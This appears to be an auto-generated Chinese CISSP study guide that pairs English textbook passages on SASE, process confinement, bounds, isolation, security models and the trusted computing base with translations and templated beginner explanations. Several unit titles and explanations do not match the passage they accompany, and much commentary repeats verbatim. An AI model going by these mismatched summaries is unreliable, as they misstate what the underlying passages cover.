场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

标准:标准给出必须满足的最低要求。

指南:指南是建议做法,不一定强制。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

零信任:零信任默认不信任任何访问请求,需要持续验证和最小权限。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 501 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Minimum level、mandatory requirement 常对应 standard。

Recommended、not compulsory 常对应 guideline。

网络题先定位层次,再判断协议、设备或攻击位置。

永不默认信任、持续验证、最小权限、微分段是零信任关键词。

安全越早进入 SDLC,修复成本越低。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
标准 标准给出必须满足的最低要求。
指南 指南是建议做法,不一定强制。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
零信任 零信任默认不信任任何访问请求,需要持续验证和最小权限。
软件开发生命周期 SDLC 把需求、设计、开发、测试、部署和维护串起来。
学习单元 16 / PDF P502

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

protection into their operations, and used by developers to integrate privacy into the products they produce. There is some integration of a few of the principles of PbD in the EU's GDPR (see Chapter 4, “Laws, Regulations, and Compliance”). For more on PbD and GPS, please visit gpsbydesign.org, review the Cavoukian paper mentioned earlier, and read an additional paper, “Privacy by Design in Law, Policy and Practice.” Learn more about privacy in Chapter 4 and about software development security in Chapter 20.

Secure Access Service Edge (SASE) Secure Access Service Edge (SASE) is a framework that combines network security functions with wide area network (WAN) capabilities, catering to the dynamic, secure access needs of modern organizations. SASE is designed to respond to the evolving IT landscape marked by trends such as cloud adoption, a mobile workforce, and an increased emphasis on network security. SASE features a cloud-native architecture, unifying traditionally separate network and security services.

This cloud-native approach allows organizations to deploy and manage their network and security services from the cloud, eliminating the need for on-premises hardware and offering scalability and flexibility. A core principle of SASE is identity-centric security, prioritizing the identity of users and devices over the traditional perimeter-based security model. This is particularly relevant in the current environment where users access resources from diverse locations and devices. This core principle is implemented through zero trust network access (ZTNA), which is founded on the concept that no entity, whether inside or outside the organization's network, should be trusted by default.

Every user and device must undergo authentication (with MFA for users when possible) and authorization processes for access. SASE also leverages edge computing, bringing security and networking closer to users and devices, reducing latency, and improving performance, especially for cloud-based applications. The framework emphasizes a globally distributed network, ensuring consistent security and performance for users regardless of their geographical location. SASE is often delivered as a service, allowing organizations to subscribe to the specific capabilities they require, simplifying management, reducing capital expenditures, and enabling scalability.

中文直译 / 整理

保护融入其运营,开发者也将其融入所生产的产品中。 欧盟《通用数据保护 条例》(GDPR)中已部分整合了PbD的若干原则(参见第4章,“法律、法 规与合规性”)。 有关PbD和GPS的更多信息,请访问gpsbydesign.org,查阅前文提到的 Cavoukian论文,并阅读另一篇论文《法律、政策与实践中由设计保障隐私》。 更多关于隐私的内容请参见第4章,关于软件开发安全的内容请参见第20章。 安全访问服务边缘(SASE) 安全访问服务边缘(SASE)是一种将网络安全功能与广域网(WAN)能力相 结合的框架,旨在满足现代组织动态且安全的访问需求。 SASE旨在应对日益 变化的IT环境,其趋势包括云采用、移动办公以及对网络安全的日益重视。 SASE采用云原生架构,将传统上分离的网络和安全服务统一起来。 这种云原 生方法使组织能够从云端部署和管理其网络与安全服务,无需依赖本地硬件, 从而提供可扩展性和灵活性。 SASE的核心原则是以身份为中心的安全性,优先考虑用户和设备的身份,而非 传统的基于边界的安全模型。 在当前用户从多样化的地点和设备访问资源的环 境中,这一原则尤为重要。

该核心原则通过零信任网络访问(ZTNA)实现,其 基础理念是:无论实体位于组织网络内部还是外部,均不应默认受信任。 每个 用户和设备都必须经过身份验证(尽可能对用户启用多因素认证)和授权流程, 方可获得访问权限。 SASE 还利用边缘计算,将安全性和网络功能更接近用户和设备,降低延迟并 提升性能,尤其适用于基于云的应用程序。 该框架强调全球分布的网络,确保 用户无论身处何地都能获得一致的安全性和性能。 SASE 通常以服务形式提供, 使组织能够订阅其所需的特定功能,简化管理、降低资本支出,并实现可扩展 性。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

政策:政策是高层原则,说明必须遵守什么。

程序:程序是一步一步怎么做。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
身份 身份是主体在系统中的标识。
多因素认证 MFA 使用至少两类不同认证因素,提高认证可信度。
零信任 零信任默认不信任任何访问请求,需要持续验证和最小权限。
学习单元 17 / PDF P503

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

Continuous monitoring of user behavior and network conditions is a key aspect of SASE, enabling adaptive security measures that respond to changes in real time, contributing to an enhanced overall security posture. Implementing SASE addresses the challenges posed by the modern IT landscape, providing a more agile and scalable approach to network and security services. It aligns well with the needs of a distributed and mobile workforce and accommodates the increasing reliance on cloud-based applications and resources.

Techniques for Ensuring CIA To ensure the confidentiality, integrity, and availability (CIA) of data, you must ensure that all components that have access to data are secure and well behaved. Software designers use different techniques to ensure that programs do only what is required and nothing more. Although the concepts we discuss in the following sections all relate to software programs, they are also commonly used in all areas of security. For example, physical confinement guarantees that all physical access to hardware is controlled. Confinement Software designers use process confinement to restrict the actions of a program.

Simply put, process confinement allows a process to read from and write to only certain memory locations and resources. This is also known as sandboxing. It is the application of the principle of least privilege to processes. The goal of confinement is to prevent data leakage to unauthorized programs, users, or systems. The operating system, or some other security component, disallows illegal read/write requests. If a process attempts to initiate an action beyond its granted authority, that action will be denied. In addition, further actions, such as logging the violation attempt, may be taken. Generally, the offending process is terminated.

Confinement can be implemented in the operating system itself (such as through process isolation and memory protection), through the use of a confinement application or service (for example, Sandboxie at sandboxie.com), or through a virtualization or hypervisor solution (such as VMware or Oracle's VirtualBox). Bounds

中文直译 / 整理

对用户行为和网络状况的持续监控是 SASE 的关键方面,它能够实现自适应安 全措施,实时响应变化,从而提升整体安全态势。 实施SASE应对了现代IT环境带来的挑战,为网络和安全服务提供了更敏捷、 可扩展的解决方案。 它很好地契合了分布式和移动式员工的需求,并适应 了对基于云的应用程序和资源日益增长的依赖。 确保CIA的技术 为确保数据的机密性、完整性和可用性(CIA),您必须确保所有访问数据的 组件都是安全且行为良好的。 软件设计者采用不同的技术,以确保程序仅执行 所需的操作,而不会做任何多余的事情。 尽管我们在以下章节中讨论的概念均 与软件程序相关,但它们也普遍应用于安全的各个领域。 例如,物理隔离可确 保对硬件的所有物理访问都受到控制。 隔离 软件设计者使用进程隔离来限制程序的行为。 简而言之,进程隔离允许进程仅 读取和写入特定的内存位置和资源。 这也称为沙箱。 这是将最小权限原则应用 于进程的做法。 隔离的目标是防止数据泄露给未经授权的程序、用户或系统。 操作系统或其他安全组件会拒绝非法的读/写请求。 如果某个进程试图执行超出 其授权范围的操作,该操作将被拒绝。 此外,还可能采取进一步的措施,例如 记录违规尝试。

通常,违规进程会被终止。 隔离可以通过操作系统本身实现 (例如通过进程隔离和内存保护),通过使用隔离应用程序或服务(例如 Sandboxie 在 sandboxie.com),或通过虚拟化或虚拟机监控程序解决方案 (例如 VMware 或 Oracle 的 VirtualBox)来实现。 边界

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

授权:授权是认证之后决定你能访问什么、能做什么。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

认证成功不等于什么都能做;权限仍要单独授权。

ISO 偏标准和管理体系。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
授权 授权是认证之后决定你能访问什么、能做什么。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
程序 程序是一步一步怎么做。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 18 / PDF P504

授权、审计与问责

认证后还要授权,之后靠审计和日志追责。

教材原文段落

Each process that runs on a system is assigned an authority level. The authority level tells the operating system what the process can do. In simple systems, there may be only two authority levels: user and kernel. The authority level tells the operating system how to set the bounds for a process. The bounds of a process consist of limits set on the memory addresses and resources it can access. The bounds state the area within which a process is confined or contained. In most systems, these bounds segment logical areas of memory for each process to use. It is the responsibility of the operating system to enforce these logical bounds and to disallow access to other processes.

More secure systems may require physically bounded processes. Physical bounds require each bounded process to run in an area of memory that is physically separated from other bounded processes, not just logically bounded in the same memory space. Physically bounded memory can be very expensive, but it's also more secure than logical bounds. Bounds can be a means to enforce confinement. Isolation When a process is confined through enforcing access bounds, that process runs in isolation. Process isolation ensures that any behavior will affect only the memory and resources associated with the isolated process.

Isolation is used to protect the operating environment, the kernel of the operating system, and other independent applications. Isolation is an essential component of a stable operating system. Isolation is what prevents an application from accessing the memory or resources of another application, whether for good or ill. Isolation allows for a fail-soft environment so that separate processes can operate normally or fail/crash without interfering or affecting other processes. Isolation is achieved through the enforcement of containment using bounds. Hardware and software isolation implementations are discussed throughout Chapter 9.

These three concepts (confinement, bounds, and isolation) make designing secure programs and operating systems more difficult, but they also make it possible to implement more secure systems. Confinement is making sure that an active process can only access specific resources (such as memory). Bounds is the limitation of authorization assigned to a process to limit the resources the process can interact with and the types of interactions allowed. Isolation is the means by which confinement is implemented through the use of bounds. The goals of these concepts are to ensure that the predetermined

中文直译 / 整理

在系统上运行的每个进程都会被分配一个权限级别。 权限级别告诉操作系统该 进程可以执行的操作。 在简单的系统中,可能只有两个权限级别:用户和内核。 权限级别告诉操作系统如何为进程设置边界。 进程的 边界 包括对其可访问的内 存地址和资源所设定的限制。 边界定义了进程被限制或包含的范围。 在大多数 系统中,这些边界将每个进程的逻辑内存区域进行分段。 操作系统有责任强制 执行这些逻辑边界,并拒绝访问其他进程。 更安全的系统可能要求物理边界进 程。 物理边界要求每个受限制的进程在物理上与其他受限制进程分离的内存区 域中运行,而不仅仅是在同一内存空间中逻辑上受限。 物理边界内存可能非常 昂贵,但其安全性高于逻辑边界。 边界可以作为强制隔离的手段。 隔离 当一个进程通过强制访问边界进行约束时,该进程将在隔离环境中运行。 进程 隔离确保任何行为仅影响与隔离进程相关的内存和资源。 隔离用于保护操作系 统环境、操作系统的内核以及其他独立应用程序。 隔离是稳定操作系统的重要 组成部分。 隔离防止应用程序无论出于善意还是恶意都访问其他应用程序的内 存或资源。

隔离允许创建一个容错环境,使独立进程能够正常运行或失败/崩 溃,而不会干扰或影响其他进程。 隔离通过使用边界强制实施容器化来实现。 硬件和软件隔离的实现将在第9章中讨论。 这三个概念(约束、边界和隔离)使得设计安全的程序和操作系统更加困难, 但同时也使得实现更安全的系统成为可能。 约束是指确保一个活动进程只能访 问特定资源(如内存)。 边界是指限制分配给进程的权限,以限制进程可以交 互的资源类型和允许的交互方式。 隔离是通过使用边界来实现约束的手段。 这 些概念的目标是确保预设的

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证后还要授权,之后靠审计和日志追责。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

程序:程序是一步一步怎么做。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“授权、审计与问责”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

ISO 偏标准和管理体系。

Step-by-step、SOP 常对应 procedure。

日志要保护完整性、时间同步和访问控制。

事件响应中先控制影响,再根除原因。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
程序 程序是一步一步怎么做。
日志 日志记录系统和用户活动,用于监控、审计和调查。
遏制 遏制先阻止事件继续扩大,不急着完全修复。
学习单元 19 / PDF P505

第 505 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

scope of resource access is not violated and that any failure or compromise of a process has minimal to no effect on any other process. Access Controls To ensure the security of a system, you need to allow subjects to access only authorized objects. Access controls limit the access of a subject to an object. Access rules state which objects are valid for each subject. Further, an object might be valid for one type of access and be invalid for another type of access. There are a wide range of options for access controls, such as discretionary, role-based, and mandatory. Please see Chapter 14 for an in-depth discussion of access controls.

Trust and Assurance A trusted system is one in which all protection mechanisms work together to process sensitive data for many types of users while maintaining a stable and secure computing environment. In other words, trust is the presence of a security mechanism, function, or capability. Assurance is the degree of confidence in the satisfaction of security needs. In other words, assurance is how reliable the security mechanisms are at providing security. Assurance must be continually maintained, updated, and reverified. This is true if the secured system experiences a known change (good or bad—i.e., a vendor patch or a malicious exploit) or if a significant amount of time has passed.

In either case, change has occurred at some level. Change is often the antithesis of security; it often diminishes security. This is why change management, patch management, and configuration management are so important to security management. Assurance varies from one system to another and often must be established on individual systems. However, there are grades or levels of assurance that can be placed across numerous systems of the same type, systems that support the same services, or systems that are deployed in the same geographic location.

Thus, trust can be built into a system by implementing specific security features, whereas assurance is an assessment of the reliability and usability of those security features in a real-world situation. Understand the Fundamental Concepts of Security Models

中文直译 / 整理

资源访问范围不被违反,并且任何进程的故障或被攻破对其他进程的影响最小甚至 没有。 访问控制 为确保系统的安全性,您需要仅允许主体访问授权的对象。 访问控制限制主体 对对象的访问。 访问规则规定每个主体允许访问的对象。 此外,一个对象可能 对某种类型的访问有效,而对另一种类型的访问无效。 访问控制有多种选项, 例如自主型、基于角色型和强制型。 请参阅第14章以深入了解访问控制。 信任与保障 一个可信系统是指所有保护机制协同工作,为多种类型的用户处理敏感数据, 同时维持一个稳定且安全的计算环境。 换句话说,信任是指安全机制、功能或 能力的存在。 保障是对安全需求得到满足的信心程度。 换句话说,保障是安全 机制提供安全性时的可靠程度。 保障必须持续维护、更新和重新验证。 无论受 保护系统发生已知变化(无论是好是坏——例如供应商补丁或恶意利用),还 是经过了相当长的时间,都必须如此。 在任何情况下,某种程度上都发生了变 化。 变化往往是安全的对立面; 它常常削弱安全性。 这就是为什么变更管理、 补丁管理和配置管理对安全管理如此重要的原因。 可信度因系统而异,通常必须在各个系统上单独建立。

然而,对于同一类型 的系统、支持相同服务的系统或部署在同一地理区域的系统,可以采用统一 的可信度等级。 因此,通过实施特定的安全功能,可以在系统中建立信任; 而可信度则是对这些安全功能在现实环境中的可靠性和可用性进行的评估。 理解安全模型的基本概念

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

可用性:可用性保证授权用户需要时能及时使用系统和数据。

授权:授权是认证之后决定你能访问什么、能做什么。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 505 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

认证成功不等于什么都能做;权限仍要单独授权。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
可用性 可用性保证授权用户需要时能及时使用系统和数据。
授权 授权是认证之后决定你能访问什么、能做什么。
学习单元 20 / PDF P506

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

In information security, models provide a way to formalize security policies. Such models can be abstract or intuitive, but all are intended to provide an explicit set of rules that a computer can follow to implement the fundamental security concepts, processes, and procedures of a security policy. A security model provides a way for designers to map abstract statements into a security policy that prescribes the algorithms and data structures necessary to build hardware and software. Thus, a security model gives software designers something against which to measure their design and implementation.

Tokens, Capabilities, and Labels Several different methods are used to describe the necessary security attributes for an object. A security token is a separate object that is associated with a resource and describes its security attributes. This token can communicate security information about an object prior to requesting access to the actual object. In other implementations, various lists are used to store security information about multiple objects. A capabilities list maintains a row of security attributes for each controlled object. Although not as flexible as the token approach, a capabilities list generally offers quicker lookups when a subject requests access to an object.

A third common type of attribute storage is called a security label, which is generally a permanent part of the object to which it's attached. Once a security label is set, it usually cannot be altered. This permanence provides another safeguard against tampering that neither tokens nor capabilities lists provide. You'll explore several security models in the following sections; all of them can shed light on how security enters into computer architectures and operating system design: Trusted computing base State machine model Information flow model Noninterference model Take-grant model Access control matrix

中文直译 / 整理

在信息安全中,模型提供了一种形式化安全策略的方式。 这些模型可以是抽象 的或直观的,但所有模型都旨在提供一组明确的规则,供计算机遵循以实现安 全策略的基本安全概念、流程和程序。 安全模型为设计者提供了一种将抽象陈 述映射到安全策略的方法,该策略规定了构建硬件和软件所需的算法和数据结 构。 因此,安全模型为软件设计者提供了一个衡量其设计和实现的基准。 令牌、能力与标签 有多种不同的方法用于描述对象所需的安全属性。 安全令牌是一个与资源关 联的独立对象,用于描述其安全属性。 该令牌可以在请求访问实际对象之前, 传达有关对象的安全信息。 在其他实现中,使用各种列表来存储多个对象的 安全信息。 一个能力列表为每个受控对象维护一行安全属性。 尽管不如令牌 方法灵活,能力列表在主体请求访问对象时通常能提供更快的查找速度。 第 三种常见的属性存储类型称为安全标签,它通常是所附对象的永久组成部分。 一旦设置了安全标签,通常无法更改。 这种永久性提供了另一种防止篡改的 保护措施,而令牌和能力列表都无法提供这种保护。 在接下来的章节中,您将探索多种安全模型;

所有这些模型都能阐明安全如 何融入计算机架构和操作系统设计: 可信计算基 状态机模型 信息流模型 非干扰模型 Take‑grant模型 访问控制矩阵

小白解释

场景先行:你是公司的安全负责人,正在读第 506 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

抽象:抽象把复杂细节藏在接口后,只暴露必要功能。

政策:政策是高层原则,说明必须遵守什么。

程序:程序是一步一步怎么做。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

对象、角色、组、接口都可能体现 abstraction。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
抽象 抽象把复杂细节藏在接口后,只暴露必要功能。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
学习单元 21 / PDF P507

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

Bell–LaPadula model Biba model Clark–Wilson model Brewer and Nash model Other Security Models There are several more security models you can learn about if you formally study computer security, systems design, or application development. Some of those include the object-capability model, Lipner's Model, the Boebert and Kain Integrity model, the two-compartment exchange (Kärger) model, Gong's JDK Security Model, the Lee–Shockley model, the Jueneman model, and more. Trusted Computing Base The trusted computing base (TCB) design principle is the combination of hardware, software, and controls that work together to form a trusted base to enforce your security policy.

The TCB is a subset of a complete information system. It should be as small as possible so that a detailed analysis can reasonably ensure that the system meets design specifications and requirements. The TCB is the only portion of that system that can be trusted to adhere to and enforce the security policy. It is the responsibility of TCB components to ensure that a system behaves properly in all cases and that it adheres to the security policy under all circumstances. Security Perimeter The security perimeter of your system is an imaginary boundary that separates the TCB from the rest of the system (Figure 8.2).

This boundary ensures that no insecure communications or interactions occur between the TCB and the remaining elements of the computer system. For the TCB to communicate with the rest of the system, it must create secure channels, also called trusted paths. A trusted path is a channel established with strict standards to allow necessary communication to occur without exposing the TCB to security exploitations. Bell–LaPadula

中文直译 / 整理

模型 Biba模型 Clark–Wilson模型 Brewer和Nash模型 其他安全模型 如果您正式学习计算机安全、系统设计或应用程序开发,还可以了解其他 几种安全模型。 其中一些包括对象能力模型、Lipner模型、Boebert和 Kain完整性模型、双隔间交换(Kärger)模型、Gong的JDK安全模型、 Lee–Shockley模型、Jueneman模型等。 可信计算基 受信计算基(TCB)设计原则是硬件、软件和控制措施的组合,它们协同工作 以形成一个受信基础,用于执行您的安全策略。 TCB 是完整信息系统的一个子 集,应尽可能小,以便通过详细分析合理确保系统符合设计规范和要求。 TCB 是系统中唯一可以信赖其遵守并执行安全策略的部分。 TCB 组件有责任 确保系统在所有情况下均能正常运行,并在所有情况下都遵守安全策略。 安全边界 系统的 安全边界 是一个假想的边界,用于将 TCB 与系统的其余部分隔离开 (图 8.2)。 此边界确保 TCB 与计算机系统的其他元素之间不会发生不安全的 通信或交互。 为了使 TCB 能够与系统的其余部分通信,它必须建立安全通道, 也称为 可信路径。

可信路径是根据严格标准建立的通道,以确保必要的通信能 够进行,同时避免 TCB 暴露于安全漏洞之中。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

安全边界:安全边界是不同信任级别或安全要求交接的位置。

政策:政策是高层原则,说明必须遵守什么。

标准:标准给出必须满足的最低要求。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

内网/外网、DMZ/内网、不同分类级别之间都是常见边界。

Policy 高层、强制、稳定;Procedure 具体步骤。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
安全边界 安全边界是不同信任级别或安全要求交接的位置。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
学习单元 22 / PDF P508

授权、审计与问责

认证后还要授权,之后靠审计和日志追责。

教材原文段落

FIGURE 8.2 The TCB, security perimeter, and reference monitor Reference Monitors and Kernels The part of the TCB that validates access to every resource prior to granting access requests is called the reference monitor (Figure 8.2). The reference monitor stands between every subject and object, verifying that a requesting subject's credentials meet the object's access requirements before any requests are allowed to proceed. Effectively, the reference monitor is the access control enforcer for the TCB. The reference monitor enforces access control or authorization based on the desired security model, whether discretionary, mandatory, role-based, or some other form of access control.

中文直译 / 整理

图 8.2 TCB、安全边界和参考监控器 参考监控器与内核 TCB 中在授予访问请求之前验证对每个资源访问的部分称为 参考监视器(图 8.2)。 参考监视器位于每个主体和对象之间,在允许任何请求继续之前,验 证请求主体的凭据是否满足对象的访问要求。 实际上,参考监视器是 TCB 的 访问控制执行者。 参考监视器根据所需的安全模型(无论是自主的、强制的、 基于角色的,还是其他形式的访问控制)来执行访问控制或授权。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证后还要授权,之后靠审计和日志追责。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

安全边界:安全边界是不同信任级别或安全要求交接的位置。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“授权、审计与问责”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

